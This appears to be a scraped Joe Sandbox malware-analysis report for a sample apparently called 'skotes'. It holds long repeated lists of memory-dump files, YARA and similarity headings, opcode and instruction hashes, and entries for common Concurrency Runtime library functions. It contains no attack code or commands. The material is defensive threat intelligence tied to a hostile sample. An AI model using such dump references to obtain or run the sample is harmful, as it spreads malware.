                                                                                                                                                                    • Associated: 00000006.00000002.3380639626.000000000067B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380716683.0000000000685000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380817293.0000000000686000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380906503.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381354663.00000000007DD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381469497.00000000007E0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381552894.00000000007EE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381552894.00000000007FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381695825.0000000000800000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381778158.0000000000801000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381846199.0000000000802000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381939760.0000000000803000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382119598.000000000080E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382240516.000000000080F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382319889.0000000000810000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382394515.0000000000812000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382482520.000000000082C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382540800.000000000082E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382621872.000000000082F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382687096.0000000000830000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382752221.0000000000837000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382815338.0000000000841000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382910219.000000000085E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382949661.000000000085F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383013206.0000000000860000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383157139.0000000000867000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383316521.0000000000868000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383390501.000000000086C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383468207.0000000000879000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383505709.000000000087B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383557411.000000000087C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383623379.000000000087F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383677747.0000000000888000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383715340.0000000000890000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383770746.0000000000897000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383832437.0000000000899000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383974699.00000000008C9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384027465.00000000008CA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384027465.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384129731.0000000000901000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384176428.0000000000903000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384197388.0000000000904000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384236784.0000000000909000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384276090.000000000090B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384317353.0000000000918000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384354809.0000000000919000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_6_2_610000_skotes.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Concurrency::details::Context$Base::$GroupScheduleSegment$AssignAvailableConcurrency::location::_EventInternalMakeProcessor::ReleaseRunnableTraceVirtual
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 512098550-0
                                                                                                                                                                    • Opcode ID: 9b17aee4ad1cbc258d3a583d6ba2c302830390c7a673b90a623c3654d554005b
                                                                                                                                                                    • Instruction ID: 5401c0398ffcea4087cbd78b491b641525529c7ea6455a0b13188213d71fa12a
                                                                                                                                                                    • Opcode Fuzzy Hash: 9b17aee4ad1cbc258d3a583d6ba2c302830390c7a673b90a623c3654d554005b
                                                                                                                                                                    • Instruction Fuzzy Hash: 88413B75A00619EFCB49DF64C854AADB7B6FF88310F048169E906AB3D0CB75AE01CBD1
                                                                                                                                                                    Function 0063D2B9 Relevance: 7.6, APIs: 5, Instructions: 97COMMONLIBRARYCODE
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • Concurrency::details::ReferenceCountedQuickBitSet::InterlockedSet.LIBCONCRT ref: 0063D344
                                                                                                                                                                    • ListArray.LIBCONCRT ref: 0063D367
                                                                                                                                                                    • Concurrency::details::SchedulerBase::VirtualProcessorActive.LIBCONCRT ref: 0063D370
                                                                                                                                                                    • ListArray.LIBCONCRT ref: 0063D3A8
                                                                                                                                                                    • Concurrency::details::VirtualProcessor::MakeAvailable.LIBCONCRT ref: 0063D3B3
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000006.00000002.3380170791.0000000000611000.00000040.00000001.01000000.00000007.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                    • Associated: 00000006.00000002.3380071723.0000000000610000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380170791.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380551481.0000000000679000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380639626.000000000067B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380716683.0000000000685000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380817293.0000000000686000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380906503.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381354663.00000000007DD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381469497.00000000007E0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381552894.00000000007EE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381552894.00000000007FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381695825.0000000000800000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381778158.0000000000801000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381846199.0000000000802000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381939760.0000000000803000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382119598.000000000080E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382240516.000000000080F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382319889.0000000000810000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382394515.0000000000812000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382482520.000000000082C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382540800.000000000082E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382621872.000000000082F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382687096.0000000000830000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382752221.0000000000837000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382815338.0000000000841000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382910219.000000000085E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382949661.000000000085F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383013206.0000000000860000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383157139.0000000000867000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383316521.0000000000868000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383390501.000000000086C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383468207.0000000000879000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383505709.000000000087B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383557411.000000000087C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383623379.000000000087F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383677747.0000000000888000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383715340.0000000000890000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383770746.0000000000897000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383832437.0000000000899000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383974699.00000000008C9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384027465.00000000008CA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384027465.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384129731.0000000000901000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384176428.0000000000903000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384197388.0000000000904000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384236784.0000000000909000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384276090.000000000090B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384317353.0000000000918000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384354809.0000000000919000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_6_2_610000_skotes.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Concurrency::details::$ArrayListVirtual$ActiveAvailableBase::CountedInterlockedMakeProcessorProcessor::QuickReferenceSchedulerSet::
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 4212520697-0
                                                                                                                                                                    • Opcode ID: 6ed711b44c277c0b7d94b81d13c7cd601a52b8c640641078e62eecb8edf1bce8
                                                                                                                                                                    • Instruction ID: 4dd49e557a7ca6e7d7db142ca5ca8015ce0c29ed3e88df90ff2c134b92212f6e
                                                                                                                                                                    • Opcode Fuzzy Hash: 6ed711b44c277c0b7d94b81d13c7cd601a52b8c640641078e62eecb8edf1bce8
                                                                                                                                                                    • Instruction Fuzzy Hash: 4F31AD35700610AFDB45EF64D895BAEB7A7EF89310F050099E8069B392CB70ED41CBD2
                                                                                                                                                                    Function 006386C9 Relevance: 7.6, APIs: 5, Instructions: 88COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • _SpinWait.LIBCONCRT ref: 006386EE
                                                                                                                                                                      • Part of subcall function 0062EAD0: _SpinWait.LIBCONCRT ref: 0062EAE8
                                                                                                                                                                    • Concurrency::details::ContextBase::ClearAliasTable.LIBCONCRT ref: 00638702
                                                                                                                                                                    • Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 00638734
                                                                                                                                                                    • List.LIBCMT ref: 006387B7
                                                                                                                                                                    • List.LIBCMT ref: 006387C6
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000006.00000002.3380170791.0000000000611000.00000040.00000001.01000000.00000007.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                    • Associated: 00000006.00000002.3380071723.0000000000610000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380170791.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380551481.0000000000679000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380639626.000000000067B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380716683.0000000000685000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380817293.0000000000686000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380906503.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381354663.00000000007DD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381469497.00000000007E0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381552894.00000000007EE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381552894.00000000007FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381695825.0000000000800000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381778158.0000000000801000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381846199.0000000000802000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381939760.0000000000803000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382119598.000000000080E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382240516.000000000080F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382319889.0000000000810000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382394515.0000000000812000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382482520.000000000082C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382540800.000000000082E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382621872.000000000082F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382687096.0000000000830000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382752221.0000000000837000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382815338.0000000000841000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382910219.000000000085E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382949661.000000000085F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383013206.0000000000860000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383157139.0000000000867000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383316521.0000000000868000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383390501.000000000086C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383468207.0000000000879000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383505709.000000000087B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383557411.000000000087C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383623379.000000000087F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383677747.0000000000888000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383715340.0000000000890000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383770746.0000000000897000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383832437.0000000000899000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383974699.00000000008C9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384027465.00000000008CA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384027465.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384129731.0000000000901000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384176428.0000000000903000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384197388.0000000000904000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384236784.0000000000909000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384276090.000000000090B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384317353.0000000000918000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384354809.0000000000919000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_6_2_610000_skotes.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ListSpinWait$AcquireAliasBase::ClearConcurrency::details::Concurrency::details::_ContextLock::_ReaderTableWriteWriter
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3281396844-0
                                                                                                                                                                    • Opcode ID: e7fdb6275bd5c9061aee22d1fa0addcb2444cb899dfda521567778872f50955b
                                                                                                                                                                    • Instruction ID: 013065d9d52085237f5b2f00aa5f4a541374f31ec548a014d817f88869180228
                                                                                                                                                                    • Opcode Fuzzy Hash: e7fdb6275bd5c9061aee22d1fa0addcb2444cb899dfda521567778872f50955b
                                                                                                                                                                    • Instruction Fuzzy Hash: 16314636901766DFCB54EFA4D5916EDBBB3BF54318F24006EE40267652CB31AA04CBD8
                                                                                                                                                                    Function 0064182A Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 85COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 006418A4
                                                                                                                                                                    • Concurrency::details::FreeVirtualProcessorRoot::SpinUntilIdle.LIBCONCRT ref: 006418EB
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000006.00000002.3380170791.0000000000611000.00000040.00000001.01000000.00000007.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                    • Associated: 00000006.00000002.3380071723.0000000000610000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380170791.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380551481.0000000000679000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380639626.000000000067B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380716683.0000000000685000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380817293.0000000000686000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380906503.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381354663.00000000007DD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381469497.00000000007E0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381552894.00000000007EE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381552894.00000000007FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381695825.0000000000800000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381778158.0000000000801000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381846199.0000000000802000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381939760.0000000000803000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382119598.000000000080E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382240516.000000000080F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382319889.0000000000810000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382394515.0000000000812000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382482520.000000000082C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382540800.000000000082E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382621872.000000000082F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382687096.0000000000830000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382752221.0000000000837000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382815338.0000000000841000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382910219.000000000085E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382949661.000000000085F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383013206.0000000000860000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383157139.0000000000867000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383316521.0000000000868000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383390501.000000000086C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383468207.0000000000879000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383505709.000000000087B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383557411.000000000087C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383623379.000000000087F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383677747.0000000000888000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383715340.0000000000890000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383770746.0000000000897000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383832437.0000000000899000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383974699.00000000008C9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384027465.00000000008CA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384027465.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384129731.0000000000901000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384176428.0000000000903000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384197388.0000000000904000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384236784.0000000000909000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384276090.000000000090B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384317353.0000000000918000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384354809.0000000000919000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_6_2_610000_skotes.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Concurrency::details::FreeIdleProcessorRoot::SpinUntilVirtualstd::invalid_argument::invalid_argument
                                                                                                                                                                    • String ID: pContext
                                                                                                                                                                    • API String ID: 3390424672-2046700901
                                                                                                                                                                    • Opcode ID: f148354f9281b8a2e26650bb727df1f1822a227f08efc01b74940033486b08c9
                                                                                                                                                                    • Instruction ID: ee2a1bd52bd9af50d64d8efda90e2a4a8e4864ad8e8e4cb842e995590b78f6e8
